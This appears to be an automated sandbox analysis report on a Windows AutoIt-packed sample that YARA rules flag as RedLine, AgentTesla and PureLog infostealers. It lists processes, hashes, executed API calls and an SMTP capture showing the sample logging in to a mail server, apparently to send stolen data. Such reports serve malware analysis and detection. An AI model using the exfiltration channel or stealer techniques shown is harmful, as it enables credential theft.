Jul 1, 2024 20:29:25.840574980 CEST	587	49755	79.170.44.32	192.168.2.4	250-mta1.hi.local Hello 579569 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-CHUNKING 250-STARTTLS 250 HELP
Jul 1, 2024 20:29:25.842904091 CEST	49755	587	192.168.2.4	79.170.44.32	AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
Jul 1, 2024 20:29:26.043775082 CEST	587	49755	79.170.44.32	192.168.2.4	334 UGFzc3dvcmQ6
Jul 1, 2024 20:29:26.234744072 CEST	587	49755	79.170.44.32	192.168.2.4	235 Authentication succeeded

Target ID:	0
Start time:	14:25:15
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\GkYUK8VCrO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\GkYUK8VCrO.exe"
Imagebase:	0xaa0000
File size:	1'623'552 bytes
MD5 hash:	7D50650CD2BA63482D4CAF875AE65A8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:25:15
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\GkYUK8VCrO.exe"
Imagebase:	0x270000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:25:16
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\GkYUK8VCrO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\GkYUK8VCrO.exe"
Imagebase:	0xaa0000
File size:	1'623'552 bytes
MD5 hash:	7D50650CD2BA63482D4CAF875AE65A8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:25:16
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\GkYUK8VCrO.exe"
Imagebase:	0xe10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4149885312.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	53

Executed Functions

Function 00AA3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AA3B7A
IsDebuggerPresent.KERNEL32 ref: 00AA3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00B662F8,00B662E0,?,?), ref: 00AA3BFD

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

Part of subcall function 00AB0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AA3C26,00B662F8,?,?,?), ref: 00AB0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00AA3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00B593F0,00000010), ref: 00ADD4BC
SetCurrentDirectoryW.KERNEL32(?,00B662F8,?,?,?), ref: 00ADD4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B55D40,00B662F8,?,?,?), ref: 00ADD57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00ADD581

Part of subcall function 00AA3A58: GetSysColorBrush.USER32(0000000F), ref: 00AA3A62
Part of subcall function 00AA3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00AA3A71
Part of subcall function 00AA3A58: LoadIconW.USER32(00000063), ref: 00AA3A88
Part of subcall function 00AA3A58: LoadIconW.USER32(000000A4), ref: 00AA3A9A
Part of subcall function 00AA3A58: LoadIconW.USER32(000000A2), ref: 00AA3AAC
Part of subcall function 00AA3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA3AD2
Part of subcall function 00AA3A58: RegisterClassExW.USER32(?), ref: 00AA3B28

Part of subcall function 00AA39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA3A15
Part of subcall function 00AA39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3A36
Part of subcall function 00AA39E7: ShowWindow.USER32(00000000,?,?), ref: 00AA3A4A
Part of subcall function 00AA39E7: ShowWindow.USER32(00000000,?,?), ref: 00AA3A53

Part of subcall function 00AA43DB: _memset.LIBCMT ref: 00AA4401
Part of subcall function 00AA43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA44A6

Strings

runas, xrefs: 00ADD575
This is a third-party compiled AutoIt script., xrefs: 00ADD4B4

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 0afecad1091ef3c1ae83a12e92fbae4c963a414e0816b213dd0dae684c88619c
Instruction ID: e3ba75c895393b5f8d4aa145a1240457ad4185c64b20aa3bac38899c34adb46f
Opcode Fuzzy Hash: 0afecad1091ef3c1ae83a12e92fbae4c963a414e0816b213dd0dae684c88619c
Instruction Fuzzy Hash: 6151E672904249AACF21EFB4DD15EFE7BB8AF06710B0041B5F411632E1DFB84A0ACB21

Function 00AA4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00AA4B2B

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

GetCurrentProcess.KERNEL32(?,00B2FAEC,00000000,00000000,?), ref: 00AA4BF8
IsWow64Process.KERNEL32(00000000), ref: 00AA4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00AA4C45
FreeLibrary.KERNEL32(00000000), ref: 00AA4C50
GetSystemInfo.KERNEL32(00000000), ref: 00AA4C81
GetSystemInfo.KERNEL32(00000000), ref: 00AA4C8D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: a0b6494714bd123da256ee54f03f7e2ef5a21d1516b29edd73d04298b0e24d18
Instruction ID: fc31df238eeff8183b007d8d9205f5ce5167cc61d40ff66d04ec933c3a9976d8
Opcode Fuzzy Hash: a0b6494714bd123da256ee54f03f7e2ef5a21d1516b29edd73d04298b0e24d18
Instruction Fuzzy Hash: 1D91B23154ABC0DEC731CB7885515AABFF4AF6A300B4449AEE0CB93B81D760E948C769

Function 00AA4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AA4EEE,?,?,00000000,00000000), ref: 00AA4FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AA4EEE,?,?,00000000,00000000), ref: 00AA5010
LoadResource.KERNEL32(?,00000000,?,?,00AA4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F8F), ref: 00ADDD60
SizeofResource.KERNEL32(?,00000000,?,?,00AA4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F8F), ref: 00ADDD75
LockResource.KERNEL32(00AA4EEE,?,?,00AA4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00AA4F8F,00000000), ref: 00ADDD88

Strings

SCRIPT, xrefs: 00AA5006

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: c79371c0abb725b2e82e89b6dca118f7743c201d62c476076db97c617c7d4438
Instruction ID: 104311a41f13f4fb766bbfd3d2d4191bee2b9a9aa66e0e3794f99c3781de840b
Opcode Fuzzy Hash: c79371c0abb725b2e82e89b6dca118f7743c201d62c476076db97c617c7d4438
Instruction Fuzzy Hash: 54115A75600701AFD7318B65DC58F6B7BB9EBCAB11F204578F506972A0EB61E8018661

Function 00B04696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00ADE7C1), ref: 00B046A6
FindFirstFileW.KERNELBASE(?,?), ref: 00B046B7
FindClose.KERNEL32(00000000), ref: 00B046C7

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 98f916a4126c50fb29163a0af9ad8e1d83b596c1f141e7a3f8ad5fb91d99487f
Instruction ID: f90498625498457f84e2e86c124d3b33f4dcd8d48412e5592cb4452c16b47515
Opcode Fuzzy Hash: 98f916a4126c50fb29163a0af9ad8e1d83b596c1f141e7a3f8ad5fb91d99487f
Instruction Fuzzy Hash: 89E0D8718104019B8220A738EC4D4FA7BACDE07375F1007A5F935C20E0FBB059519599

Function 00AAE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00AE428C

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 28b196fae4dd9bb37d92cb5140f26874a65790e35b8acdc9583572b3b9c661b3
Instruction ID: 20b73b37204ae649d7f0ca77f297f4b1bde367681213f2a1b68e538f8206c2a9
Opcode Fuzzy Hash: 28b196fae4dd9bb37d92cb5140f26874a65790e35b8acdc9583572b3b9c661b3
Instruction Fuzzy Hash: CFA2AE75A04205CFCB24CF98C984AAEB7F1FF4A314F248069E916AB391D775ED42CB91

Function 00AB0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB0BBB
timeGetTime.WINMM ref: 00AB0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB0FB3
TranslateMessage.USER32(?), ref: 00AB0FC7
DispatchMessageW.USER32(?), ref: 00AB0FD5
Sleep.KERNEL32(0000000A), ref: 00AB0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00AB105A
DestroyWindow.USER32 ref: 00AB1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AB1080
Sleep.KERNEL32(0000000A,?,?), ref: 00AE52AD
TranslateMessage.USER32(?), ref: 00AE608A
DispatchMessageW.USER32(?), ref: 00AE6098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AE60AC

Strings

@GUI_CTRLID, xrefs: 00AE5364
@GUI_CTRLHANDLE, xrefs: 00AE540E
@TRAY_ID, xrefs: 00AE5BB9
@COM_EVENTOBJ, xrefs: 00AE591A
@GUI_WINHANDLE, xrefs: 00AE53B9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 016326a467281276377842a82c888fe771abfa3f0ea47759fc73b496f00074c9
Instruction ID: 6159df8b0bff1af8265c94e96e5babf5993935eb4a604124348cb8586f21f386
Opcode Fuzzy Hash: 016326a467281276377842a82c888fe771abfa3f0ea47759fc73b496f00074c9
Instruction Fuzzy Hash: 8AB2D170A08781DFD724DF24D994FAAB7E5BF85308F14491DF48A872A2DB74E844CB92

Function 00B093DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B091E9: __time64.LIBCMT ref: 00B091F3

Part of subcall function 00AA5045: _fseek.LIBCMT ref: 00AA505D

__wsplitpath.LIBCMT ref: 00B094BE

Part of subcall function 00AC432E: __wsplitpath_helper.LIBCMT ref: 00AC436E

_wcscpy.LIBCMT ref: 00B094D1
_wcscat.LIBCMT ref: 00B094E4
__wsplitpath.LIBCMT ref: 00B09509
_wcscat.LIBCMT ref: 00B0951F
_wcscat.LIBCMT ref: 00B09532

Part of subcall function 00B0922F: _memmove.LIBCMT ref: 00B09268
Part of subcall function 00B0922F: _memmove.LIBCMT ref: 00B09277

_wcscmp.LIBCMT ref: 00B09479

Part of subcall function 00B099BE: _wcscmp.LIBCMT ref: 00B09AAE
Part of subcall function 00B099BE: _wcscmp.LIBCMT ref: 00B09AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B096DC
_wcsncpy.LIBCMT ref: 00B0974F
DeleteFileW.KERNEL32(?,?), ref: 00B09785
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B0979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B097AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B097BE

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 7928ab1fee2e85133d6021beed49024a0a93838a68a116d799302ee89d6380eb
Instruction ID: 0342ee8b452cd57d7cf9ad1a4d79a9df6259075edd6a3c158d19c5cd50cbc142
Opcode Fuzzy Hash: 7928ab1fee2e85133d6021beed49024a0a93838a68a116d799302ee89d6380eb
Instruction Fuzzy Hash: 40C119B1D00219AADF21DFA5CD85EDEBBBDEF45300F0040AAB609E7192DB709A448F65

Function 00AA3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3074
RegisterClassExW.USER32(00000030), ref: 00AA309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
LoadIconW.USER32(000000A9), ref: 00AA30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

TaskbarCreated, xrefs: 00AA30A4
AutoIt v3 GUI, xrefs: 00AA3090
0, xrefs: 00AA3056
+, xrefs: 00AA305D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 73d842ab4fe0107fab64bb9c314c0cb5cf77e81c0ac8f20c8445a65be055ea70
Instruction ID: b7ca956a8ba12a7bd87e9dc521338678b8861f0bf353ee48af53198d83c0255b
Opcode Fuzzy Hash: 73d842ab4fe0107fab64bb9c314c0cb5cf77e81c0ac8f20c8445a65be055ea70
Instruction Fuzzy Hash: 6B31297194130AAFDB50CFA4E885AD9BBF0FB09310F10456AE590E72A0DBB94986CF51

Function 00AA3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3074
RegisterClassExW.USER32(00000030), ref: 00AA309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
LoadIconW.USER32(000000A9), ref: 00AA30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

TaskbarCreated, xrefs: 00AA30A4
AutoIt v3 GUI, xrefs: 00AA3090
0, xrefs: 00AA3056
+, xrefs: 00AA305D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6023ae5a87e92ebf952444347dda5421fd18abcf3d82203d9fb53abcf075f498
Instruction ID: f7771518f60ff504862b5f2272beb918a588de8079723fc684a7028b6a55409c
Opcode Fuzzy Hash: 6023ae5a87e92ebf952444347dda5421fd18abcf3d82203d9fb53abcf075f498
Instruction Fuzzy Hash: F721C2B1D00219AFDB10DFA4ED89BEEBBF4FB08700F00452AFA10A72A0DBB545458F95

Function 00AA71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B662F8,?,00AA37C0,?), ref: 00AA4882

